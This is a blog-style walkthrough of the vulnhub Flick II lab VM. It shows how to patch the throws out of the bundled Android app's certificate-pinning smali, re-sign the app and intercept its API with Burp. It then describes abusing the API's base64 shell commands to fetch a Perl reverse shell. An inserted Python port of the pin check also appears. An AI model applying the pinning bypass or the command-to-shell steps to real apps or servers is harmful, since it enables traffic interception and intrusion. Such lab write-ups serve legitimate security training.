vulnhub: flickII – a different approach – walkthrough part1

Hey,

Another vulnhub walkthrough, but this time a special one for me, because it required new knowledge I had only just acquired.

Flick II on vulnhub: https://www.vulnhub.com/entry/flick-2,122/

Introduction to FlickII

I first grabbed FlickII when it was fresh in August 2015. I loved that it comes with an Android APK, which is the key to hacking the VM!

So when you download and extract the VM image, it is accompanied by an Android APK! Back in August 2015 I had already figured out how to set up an Android emulator and use Burp to MitM Android apps!

However, my plans were quickly thwarted when I learned that certificate pinning is commonly used to secure the SSL traffic between Android apps and their APIs :-(

Before benching the VM for over a year I quickly checked the existing walkthroughs, but decided they were way too complicated for a “non-programmer” like myself…

Thanks SANS!

But thanks to this year's SANS Holiday Hack Challenge 2016 I learnt a great deal about hacking Android APKs!

So even before I start with the write-up of the Holiday Hack Challenge I needed to return to FlickII and apply my newly acquired skills to this VM!

The basic idea I had was that instead of diving too deep into the Android smali or decompiled Java code I would just hack out the Certificate Pinning! :-)

I loved the idea because once I manage to do this, it will be a highly useful skill for any further Android application investigations!

So let's start with the write-up:

Walkthrough Part 1: From APK to Shell

First Order of Business: Setting it all up!

As already stated, the VM comes accompanied by an Android APK and a README file:

[image: files]

The README file gives us a nice mission:

[image: mission]

So cool! :-)

So, without explaining the basics much: detecting the IP of the VM after booting:

[image: nmap-1]

And an nmap script scan:

[image: nmap-scriptscanning]

Accessing the HTTPS web server gives an API message:

[image: first-api-call]

What Android Emulator to use?

So now it is time to boot up an Android emulator! I really like the emulator from Android Studio, so I used that one. However, I have heard a lot of good talk about Genymotion! So if you don't want to install a whole Android IDE you might want to check out Genymotion!

I have not tried it yet (I really should); however, when I first started with this over a year ago Genymotion required VirtualBox as a basis. But because I already have VMware Fusion running on my Mac I did not want to install another virtualization product that hooks my network interfaces and does all the other things virtualization software needs to do to work properly…

So if you are going the Android Studio route and are using the emulator for the first time, you probably want to start the Android Virtual Device Manager:

  1. Start Android Studio
  2. Go to Tools -> Android -> AVD Manager:

[image: android-studio]

  3. Now you have a nice GUI to create a virtual Android device to your liking (the AVD Manager):

[image: avd-manager]

Here I set up a phone in AVD Manager!

Once you have a virtual Android device set up you can easily start it anytime with a direct console command:

Starting the Emulator and Setting a Proxy (and scaling the emulator window)

/path/to/Library/Android/sdk/tools/emulator @testphone -http-proxy http://192.168.0.56:8080 -scale 250dpi

Just put an @ in front of the device name you set in AVD Manager. You can also see here the option for setting a proxy and the one for scaling the emulator. In my case the window was bigger than my MacBook's resolution, so I wanted to reduce the dpi a bit.

Just play around with dpi values until the Window gets an acceptable size!

Et voilà, the emulator boots up:

[image: emulator-booting]

Once it is booted up you can install the flick-check-dist.apk using adb:

/path/to/Library/Android/sdk/platform-tools/adb install ~/Desktop/flick-check-dist.apk
1200 KB/s (1109803 bytes in 0.902s)
	pkg: /data/local/tmp/flick-check-dist.apk
Success

And you have a new program installed:

[image: apk-installed]

When you start FlickCheck, it asks for the server IP:

[image: setting-server]

When you start the emulator without an HTTP proxy you will see the app and can play around with it:

[image: free]

Now wouldn't it be great to just MitM the HTTPS API calls and send custom commands?

Turns out you can't (just yet) :-(

[image: connection-failed]

Burp will show us the problem:

[image: cert-pinning-error]

So an SSL client tells the server why it cancels the SSL negotiation (what Burp displays here is the fatal TLS alert the app sent when its trust manager rejected Burp's certificate). Neat!

Second Order of Business: MitM the APK

So now I am as far as I was in August 2015 when I stopped with this VM! Luckily, as said in the intro, this year's SANS Holiday Hack Challenge taught me how to circumvent this problem:

jadx-gui and apktool to the rescue \o/

One important lesson in IT security design is that the client is hostile! Once you release a program into the wild, you basically lose control over it!

Android Apps written in Java are very easy to reverse engineer!

The first thing I did with my newly acquired skills was to open flick-check-dist.apk in jadx-gui (grab jadx here).

This does not just disassemble the app to smali code but reconstructs an approximation of the original Java code.

In there I quickly found the class that performs the certificate pinning (the so-called TrustManager):

[image: jadx-trust-manager]

See the long PUB_KEY string? That's the pinned certificate value! (Strictly speaking it is the hex encoding of the server certificate's DER-encoded public key, as the checkServerTrusted code below shows, rather than a hash of the certificate.)

Now, what if we could just decompile the APK, change the program logic, and then recompile and run it?

Good thing we can with apktool!

Grab apktool here if you have not already downloaded it!
Now, armed with apktool, we can decode the APK to smali code:

/path/to/apktool d ~/Desktop/flick-check-dist.apk
I: Using Apktool 2.2.1 on flick-check-dist.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: ./Library/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

And now we have the decompiled application:

[image: decompiled-smali-code]

Directory listing of the decompiled smali folder

Now I asked myself the following questions:

a) How is the certificate Pinning implemented in the app?

This can easily be answered with jadx-gui! Searching for the PubKeyManager class name in the code…

[image: search-trustmanager]

…shows where it is being called:

[image: pubkeymanager-functioncall]

Now let's look at the smali code of PubKeyManager.smali:

MahcBook-Pro:flickcheck sebastianbrabetz$ cat PubKeyManager.smali 
.class public final Lcom/flick/flickcheck/PubKeyManager;
.super Ljava/lang/Object;
.source "PubKeyManager.java"

# interfaces
.implements Ljavax/net/ssl/X509TrustManager;


# static fields
.field static final synthetic $assertionsDisabled:Z

.field private static PUB_KEY:Ljava/lang/String;


# direct methods
.method static constructor <clinit>()V
    .locals 1

    .prologue
    .line 13
    const-class v0, Lcom/flick/flickcheck/PubKeyManager;

    invoke-virtual {v0}, Ljava/lang/Class;->desiredAssertionStatus()Z

    move-result v0

    if-nez v0, :cond_0

    const/4 v0, 0x1

    :goto_0
    sput-boolean v0, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    .line 17
    const-string v0, "30820122300d06092a864886f70d01010105000382010f003082010a0282010100b7051e2040155a8e78903e325a8680bd680f0c9cbd164225422a6face762db4da9c7fa11687cc10fc1a20ea1e31260525145d5b18e2692e6e61e0b00d14e78fc62d031cafef90d9dc9599527beae644d1ce0af5b4ec21d405544a1c4a69fc39704e5897791c407f5e77c8bc195be7bcdb6fb30da1f2485d8853c9ce40ebc834e5d7c5c81f052ad03a57921aa940d6b928a0cee39979398e84d9cbf57565109f42f9634db46211f65b89fb9c7375e5a9810c0a89d10b7b6d9301eab716102e35ffe09ae29f764bc2527534e68381306fb7a984c208baa00090b65f4c44d0ace781cd9779130b9e4ea1a54c8bc3c1e9fa31855ebf57f72815775bba604ed6d41290203010001"

    sput-object v0, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    return-void

    .line 13
    :cond_0
    const/4 v0, 0x0

    goto :goto_0
.end method

.method public constructor <init>()V
    .locals 0

    .prologue
    .line 13
    invoke-direct {p0}, Ljava/lang/Object;-><init>()V

    return-void
.end method


# virtual methods
.method public checkClientTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 0
    .param p1, "xcs"    # [Ljava/security/cert/X509Certificate;
    .param p2, "string"    # Ljava/lang/String;

    .prologue
    .line 71
    return-void
.end method

.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 6
    .param p1, "chain"    # [Ljava/security/cert/X509Certificate;
    .param p2, "authType"    # Ljava/lang/String;
    .annotation system Ldalvik/annotation/Throws;
        value = {
            Ljava/security/cert/CertificateException;
        }
    .end annotation

    .prologue
    .line 32
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_0

    if-nez p1, :cond_0

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    throw v3

    .line 33
    :cond_0
    if-nez p1, :cond_1

    .line 34
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate array is null"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V

    throw v3

    .line 38
    :cond_1
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_2

    array-length v3, p1

    if-gtz v3, :cond_2

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    throw v3

    .line 39
    :cond_2
    array-length v3, p1

    if-gtz v3, :cond_3

    .line 40
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate is empty"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V

    throw v3

    .line 54
    :cond_3
    const/4 v3, 0x0

    aget-object v3, p1, v3

    invoke-virtual {v3}, Ljava/security/cert/X509Certificate;->getPublicKey()Ljava/security/PublicKey;

    move-result-object v2

    check-cast v2, Ljava/security/interfaces/RSAPublicKey;

    .line 55
    .local v2, "pubkey":Ljava/security/interfaces/RSAPublicKey;
    new-instance v3, Ljava/math/BigInteger;

    const/4 v4, 0x1

    invoke-interface {v2}, Ljava/security/interfaces/RSAPublicKey;->getEncoded()[B

    move-result-object v5

    invoke-direct {v3, v4, v5}, Ljava/math/BigInteger;-><init>(I[B)V

    const/16 v4, 0x10

    invoke-virtual {v3, v4}, Ljava/math/BigInteger;->toString(I)Ljava/lang/String;

    move-result-object v0

    .line 59
    .local v0, "encoded":Ljava/lang/String;
    sget-object v3, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v3, v0}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z

    move-result v1

    .line 60
    .local v1, "expected":Z
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_4

    if-nez v1, :cond_4

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    throw v3

    .line 61
    :cond_4
    if-nez v1, :cond_5

    .line 62
    new-instance v3, Ljava/security/cert/CertificateException;

    new-instance v4, Ljava/lang/StringBuilder;

    invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V

    const-string v5, "checkServerTrusted: Expected public key: "

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    sget-object v5, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    const-string v5, ", got public key:"

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-direct {v3, v4}, Ljava/security/cert/CertificateException;-><init>(Ljava/lang/String;)V

    throw v3

    .line 66
    :cond_5
    return-void
.end method

.method public getAcceptedIssuers()[Ljava/security/cert/X509Certificate;
    .locals 1

    .prologue
    .line 76
    const/4 v0, 0x0

    return-object v0
.end method

So goto, much complex, such complicated, so wow!
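To make explicit what the PubKeyManager code above actually compares, here is an added example (my own Python, not code from the FlickCheck app or the VM) that decodes the PUB_KEY constant with a minimal DER parser and ports checkServerTrusted, standard library only. The chain is modelled as a list of DER-encoded SubjectPublicKeyInfo blobs because the Java code only ever looks at chain[0].getPublicKey().getEncoded(); the "tampered" key at the end is a constructed value for the mismatch case.

```python
"""Added example (not the FlickCheck app's own code): decode the pinned PUB_KEY
value from PubKeyManager.smali and re-implement checkServerTrusted in Python,
standard library only.

The smali computes
    encoded  = new BigInteger(1, chain[0].getPublicKey().getEncoded()).toString(16)
    expected = PUB_KEY.equalsIgnoreCase(encoded)
so PUB_KEY is the hex of the leaf's DER SubjectPublicKeyInfo, not a hash of anything.
"""

# PUB_KEY exactly as it appears in PubKeyManager.smali (split into chunks for readability)
PUB_KEY = (
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"
    "b7051e2040155a8e78903e325a8680bd" "680f0c9cbd164225422a6face762db4d"
    "a9c7fa11687cc10fc1a20ea1e3126052" "5145d5b18e2692e6e61e0b00d14e78fc"
    "62d031cafef90d9dc9599527beae644d" "1ce0af5b4ec21d405544a1c4a69fc397"
    "04e5897791c407f5e77c8bc195be7bcd" "b6fb30da1f2485d8853c9ce40ebc834e"
    "5d7c5c81f052ad03a57921aa940d6b92" "8a0cee39979398e84d9cbf57565109f4"
    "2f9634db46211f65b89fb9c7375e5a98" "10c0a89d10b7b6d9301eab716102e35f"
    "fe09ae29f764bc2527534e68381306fb" "7a984c208baa00090b65f4c44d0ace78"
    "1cd9779130b9e4ea1a54c8bc3c1e9fa3" "1855ebf57f72815775bba604ed6d4129"
    "0203010001"
)

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


class CertificateException(Exception):
    """Stands in for java.security.cert.CertificateException."""


def java_biginteger_hex(data: bytes) -> str:
    """Mimic new BigInteger(1, data).toString(16): unsigned, lower-case, leading
    zero nibbles dropped (harmless here, a DER SEQUENCE always starts with 0x30)."""
    return format(int.from_bytes(data, "big"), "x")


def _read_tlv(buf: bytes, pos: int):
    """Parse one DER tag-length-value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(der: bytes):
    """Decode SubjectPublicKeyInfo { AlgorithmIdentifier, BIT STRING { RSAPublicKey } }
    and return (modulus, public_exponent) as ints."""
    tag, spki, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    _, alg, pos = _read_tlv(spki, 0)                 # AlgorithmIdentifier
    oid_tag, oid, _ = _read_tlv(alg, 0)
    if oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bits, _ = _read_tlv(spki, pos)              # subjectPublicKey BIT STRING
    if tag != 0x03 or bits[0] != 0:                  # first byte = unused bits, must be 0
        raise ValueError("unexpected BIT STRING")
    _, rsa_pub, _ = _read_tlv(bits, 1)               # RSAPublicKey SEQUENCE { n, e }
    _, modulus, pos = _read_tlv(rsa_pub, 0)
    _, exponent, _ = _read_tlv(rsa_pub, pos)
    return int.from_bytes(modulus, "big"), int.from_bytes(exponent, "big")


def check_server_trusted(chain, pinned=PUB_KEY):
    """Port of PubKeyManager.checkServerTrusted. `chain` is a list whose first
    element is the leaf's SPKI DER (the only thing the Java code inspects).
    Returns the hex string it compared, or raises like the Java code does."""
    if chain is None:
        raise ValueError("checkServerTrusted: X509Certificate array is null")
    if len(chain) == 0:
        raise ValueError("checkServerTrusted: X509Certificate is empty")
    encoded = java_biginteger_hex(chain[0])
    if pinned.lower() != encoded.lower():            # String.equalsIgnoreCase
        raise CertificateException("checkServerTrusted: Expected public key: "
                                   + pinned + ", got public key:" + encoded)
    return encoded


def trust_decision(chain, pinned=PUB_KEY):
    """(accepted, reason) wrapper so callers need no try/except."""
    try:
        check_server_trusted(chain, pinned)
        return True, "pin matched"
    except (ValueError, CertificateException) as exc:
        return False, str(exc)


# Constructed value: the same key with its last exponent byte changed (65537 -> 65539),
# i.e. what any substituted key looks like to the check: a different hex string.
TAMPERED_SPKI_DER = bytes.fromhex(PUB_KEY[:-2] + "03")

if __name__ == "__main__":
    pinned_der = bytes.fromhex(PUB_KEY)
    n, e = parse_rsa_spki(pinned_der)
    print("pinned key: RSA", n.bit_length(), "bit, e =", e)   # RSA 2048 bit, e = 65537
    print("genuine server key:", trust_decision([pinned_der]))
    print("substituted key:   ", trust_decision([TAMPERED_SPKI_DER])[0])
```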

This brings the next question:

b) How to disable the Certificate Pinning check?

Let's look closely again at the code that calls the PubKeyManager() function in jadx:

[image: functioncall2]

Aha, exception-catching logic!

Once again the PubKeyManager function:

[image: pubkeymanager2]

So the program logic is that everything works as long as the PubKeyManager() function does not throw an exception!

Now, what did I see all over the smali code of the PubKeyManager.smali file?

 new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    throw v3

Crazy thought: What if I just remove all “throw” statements in the PubKeyManager.smali file?

The resulting code looks like this:

MahcBook-Pro:flickcheck sebastianbrabetz$ cat PubKeyManager.smali 
.class public final Lcom/flick/flickcheck/PubKeyManager;
.super Ljava/lang/Object;
.source "PubKeyManager.java"

# interfaces
.implements Ljavax/net/ssl/X509TrustManager;


# static fields
.field static final synthetic $assertionsDisabled:Z

.field private static PUB_KEY:Ljava/lang/String;


# direct methods
.method static constructor <clinit>()V
    .locals 1

    .prologue
    .line 13
    const-class v0, Lcom/flick/flickcheck/PubKeyManager;

    invoke-virtual {v0}, Ljava/lang/Class;->desiredAssertionStatus()Z

    move-result v0

    if-nez v0, :cond_0

    const/4 v0, 0x1

    :goto_0
    sput-boolean v0, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    .line 17
    const-string v0, "30820122300d06092a864886f70d01010105000382010f003082010a0282010100b7051e2040155a8e78903e325a8680bd680f0c9cbd164225422a6face762db4da9c7fa11687cc10fc1a20ea1e31260525145d5b18e2692e6e61e0b00d14e78fc62d031cafef90d9dc9599527beae644d1ce0af5b4ec21d405544a1c4a69fc39704e5897791c407f5e77c8bc195be7bcdb6fb30da1f2485d8853c9ce40ebc834e5d7c5c81f052ad03a57921aa940d6b928a0cee39979398e84d9cbf57565109f42f9634db46211f65b89fb9c7375e5a9810c0a89d10b7b6d9301eab716102e35ffe09ae29f764bc2527534e68381306fb7a984c208baa00090b65f4c44d0ace781cd9779130b9e4ea1a54c8bc3c1e9fa31855ebf57f72815775bba604ed6d41290203010001"

    sput-object v0, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    return-void

    .line 13
    :cond_0
    const/4 v0, 0x0

    goto :goto_0
.end method

.method public constructor <init>()V
    .locals 0

    .prologue
    .line 13
    invoke-direct {p0}, Ljava/lang/Object;-><init>()V

    return-void
.end method


# virtual methods
.method public checkClientTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 0
    .param p1, "xcs"    # [Ljava/security/cert/X509Certificate;
    .param p2, "string"    # Ljava/lang/String;

    .prologue
    .line 71
    return-void
.end method

.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
    .locals 6
    .param p1, "chain"    # [Ljava/security/cert/X509Certificate;
    .param p2, "authType"    # Ljava/lang/String;
    .annotation system Ldalvik/annotation/Throws;
        value = {
            Ljava/security/cert/CertificateException;
        }
    .end annotation

    .prologue
    .line 32
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_0

    if-nez p1, :cond_0

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    .line 33
    :cond_0
    if-nez p1, :cond_1

    .line 34
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate array is null"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V

    .line 38
    :cond_1
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_2

    array-length v3, p1

    if-gtz v3, :cond_2

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    .line 39
    :cond_2
    array-length v3, p1

    if-gtz v3, :cond_3

    .line 40
    new-instance v3, Ljava/lang/IllegalArgumentException;

    const-string v4, "checkServerTrusted: X509Certificate is empty"

    invoke-direct {v3, v4}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V

    .line 54
    :cond_3
    const/4 v3, 0x0

    aget-object v3, p1, v3

    invoke-virtual {v3}, Ljava/security/cert/X509Certificate;->getPublicKey()Ljava/security/PublicKey;

    move-result-object v2

    check-cast v2, Ljava/security/interfaces/RSAPublicKey;

    .line 55
    .local v2, "pubkey":Ljava/security/interfaces/RSAPublicKey;
    new-instance v3, Ljava/math/BigInteger;

    const/4 v4, 0x1

    invoke-interface {v2}, Ljava/security/interfaces/RSAPublicKey;->getEncoded()[B

    move-result-object v5

    invoke-direct {v3, v4, v5}, Ljava/math/BigInteger;-><init>(I[B)V

    const/16 v4, 0x10

    invoke-virtual {v3, v4}, Ljava/math/BigInteger;->toString(I)Ljava/lang/String;

    move-result-object v0

    .line 59
    .local v0, "encoded":Ljava/lang/String;
    sget-object v3, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v3, v0}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z

    move-result v1

    .line 60
    .local v1, "expected":Z
    sget-boolean v3, Lcom/flick/flickcheck/PubKeyManager;->$assertionsDisabled:Z

    if-nez v3, :cond_4

    if-nez v1, :cond_4

    new-instance v3, Ljava/lang/AssertionError;

    invoke-direct {v3}, Ljava/lang/AssertionError;-><init>()V

    .line 61
    :cond_4
    if-nez v1, :cond_5

    .line 62
    new-instance v3, Ljava/security/cert/CertificateException;

    new-instance v4, Ljava/lang/StringBuilder;

    invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V

    const-string v5, "checkServerTrusted: Expected public key: "

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    sget-object v5, Lcom/flick/flickcheck/PubKeyManager;->PUB_KEY:Ljava/lang/String;

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    const-string v5, ", got public key:"

    invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v4

    invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v4

    invoke-direct {v3, v4}, Ljava/security/cert/CertificateException;-><init>(Ljava/lang/String;)V

    .line 66
    :cond_5
    return-void
.end method

.method public getAcceptedIssuers()[Ljava/security/cert/X509Certificate;
    .locals 1

    .prologue
    .line 76
    const/4 v0, 0x0

    return-object v0
.end method

No more exceptions being thrown that could be caught \o/

Now packing this up again with apktool:

MahcBook-Pro:temp sebastianbrabetz$ ../path/to/apktool b flick-check-dist/ -o flick-hacked.apk
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
MahcBook-Pro:temp sebastianbrabetz$ ls -l
total 2128
drwxr-xr-x  8 sebastianbrabetz  staff      272 25 Dez 17:13 flick-check-dist
-rw-r--r--  1 sebastianbrabetz  staff  1086587 25 Dez 17:13 flick-hacked.apk

Now let's uninstall the original application:

[image: uninstall-orig-app]

And install our newly compiled, certificate-pinning-free bad boy:

MahcBook-Pro:temp sebastianbrabetz$ /path/to/Library/Android/sdk/platform-tools/adb install ~/temp/flick-hacked.apk 
963 KB/s (1086587 bytes in 1.101s)
	pkg: /data/local/tmp/flick-hacked.apk
Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]

Yet another problem! We first need to sign the APK (a self-signed certificate will suffice).

Here are two simple steps to create yourself a certificate keystore and sign with it:

1. Create a keystore (OS X):
keytool -genkey -keystore (name).keystore -validity 10000 -alias (name)

2. Sign the app:
jarsigner -keystore (name).keystore -verbose APK-NAME.apk (name)

The last argument to jarsigner is the key alias you gave keytool; in the example the keystore file and the alias simply share the same name.

In my case it looks like this:

MahcBook-Pro:temp sebastianbrabetz$ jarsigner -keystore ~/path/to/test.keystore -verbose flick-hacked.apk test
Enter Passphrase for keystore: ******
   adding: META-INF/MANIFEST.MF
   adding: META-INF/TEST.SF
   adding: META-INF/TEST.DSA
  signing: AndroidManifest.xml
  signing: classes.dex
  signing: res/... (the remaining resource files, omitted here)
  signing: res/drawable-xxxhdpi-v4/abc_btn_radio_to_on_mtrl_000.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_radio_to_on_mtrl_015.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png
  signing: res/drawable-xxxhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_ab_back_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_clear_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_copy_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_cut_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_moreoverflow_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_paste_mtrl_am_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_selectall_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_menu_share_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_search_api_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_ic_voice_search_api_mtrl_alpha.png
  signing: res/drawable-xxxhdpi-v4/abc_spinner_mtrl_am_alpha.9.png
  signing: res/drawable-xxxhdpi-v4/abc_switch_track_mtrl_alpha.9.png
  signing: res/drawable-xxxhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png
  signing: res/drawable/abc_btn_check_material.xml
  signing: res/drawable/abc_btn_default_mtrl_shape.xml
  signing: res/drawable/abc_btn_radio_material.xml
  signing: res/drawable/abc_cab_background_internal_bg.xml
  signing: res/drawable/abc_cab_background_top_material.xml
  signing: res/drawable/abc_edit_text_material.xml
  signing: res/drawable/abc_item_background_holo_dark.xml
  signing: res/drawable/abc_item_background_holo_light.xml
  signing: res/drawable/abc_list_selector_background_transition_holo_dark.xml
  signing: res/drawable/abc_list_selector_background_transition_holo_light.xml
  signing: res/drawable/abc_list_selector_holo_dark.xml
  signing: res/drawable/abc_list_selector_holo_light.xml
  signing: res/drawable/abc_ratingbar_full_material.xml
  signing: res/drawable/abc_spinner_textfield_background_material.xml
  signing: res/drawable/abc_switch_thumb_material.xml
  signing: res/drawable/abc_tab_indicator_material.xml
  signing: res/drawable/abc_textfield_search_material.xml
  signing: res/layout-v11/abc_screen_content_include.xml
  signing: res/layout-v21/abc_screen_toolbar.xml
  signing: res/layout/abc_action_bar_title_item.xml
  signing: res/layout/abc_action_bar_up_container.xml
  signing: res/layout/abc_action_bar_view_list_nav_layout.xml
  signing: res/layout/abc_action_menu_item_layout.xml
  signing: res/layout/abc_action_menu_layout.xml
  signing: res/layout/abc_action_mode_bar.xml
  signing: res/layout/abc_action_mode_close_item_material.xml
  signing: res/layout/abc_activity_chooser_view.xml
  signing: res/layout/abc_activity_chooser_view_list_item.xml
  signing: res/layout/abc_expanded_menu_layout.xml
  signing: res/layout/abc_list_menu_item_checkbox.xml
  signing: res/layout/abc_list_menu_item_icon.xml
  signing: res/layout/abc_list_menu_item_layout.xml
  signing: res/layout/abc_list_menu_item_radio.xml
  signing: res/layout/abc_popup_menu_item_layout.xml
  signing: res/layout/abc_screen_content_include.xml
  signing: res/layout/abc_screen_simple.xml
  signing: res/layout/abc_screen_simple_overlay_action_mode.xml
  signing: res/layout/abc_screen_toolbar.xml
  signing: res/layout/abc_search_dropdown_item_icons_2line.xml
  signing: res/layout/abc_search_view.xml
  signing: res/layout/abc_simple_dropdown_hint.xml
  signing: res/layout/activity_command.xml
  signing: res/layout/activity_do_register.xml
  signing: res/layout/activity_main.xml
  signing: res/layout/activity_read_api_server.xml
  signing: res/layout/activity_register.xml
  signing: res/layout/support_simple_spinner_dropdown_item.xml
  signing: res/menu/menu_command.xml
  signing: res/menu/menu_do_register.xml
  signing: res/menu/menu_main.xml
  signing: res/menu/menu_read_api_server.xml
  signing: res/menu/menu_register.xml
  signing: res/mipmap-hdpi-v4/ic_launcher.png
  signing: res/mipmap-mdpi-v4/ic_launcher.png
  signing: res/mipmap-xhdpi-v4/ic_launcher.png
  signing: res/mipmap-xxhdpi-v4/ic_launcher.png
  signing: resources.arsc
jar signed.

Warning: 
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-06) or after any future revocation date.

And now let's try installing it again:

MahcBook-Pro:temp sebastianbrabetz$ /path/to/Library/Android/sdk/platform-tools/adb install flick-hacked.apk 
803 KB/s (1110948 bytes in 1.350s)
	pkg: /data/local/tmp/flick-hacked.apk
Success

Awesome it worked!

Now let's try to MitM the app with Burp:

first-mitm-connection

And let's take a look at Burp:

first-mitm-connection2

Awesome, it worked! We can now MitM the program and see it registering the device!

We can now watch the program's API function calls:

free-in-app

And in burp:

free-in-burp

Now we can use “Action -> Send to Repeater” to interactively play with the API:

api-games

Nice!!!

Third Order of Business: From API to Shell!

You can read the source code or easily guess that the app just base64-encodes the Linux shell commands.

Let's try another one:

decoder-id

And execute it:

id-call

Gotcha! Let's see if we can download my favorite Perl reverse shell that comes with Kali onto FlickII.

First we need a simple web server to host the Perl file:

simple-http-server1

Now let's try to wget my shell:

wget-fail

command not found…

Let's try curl instead:

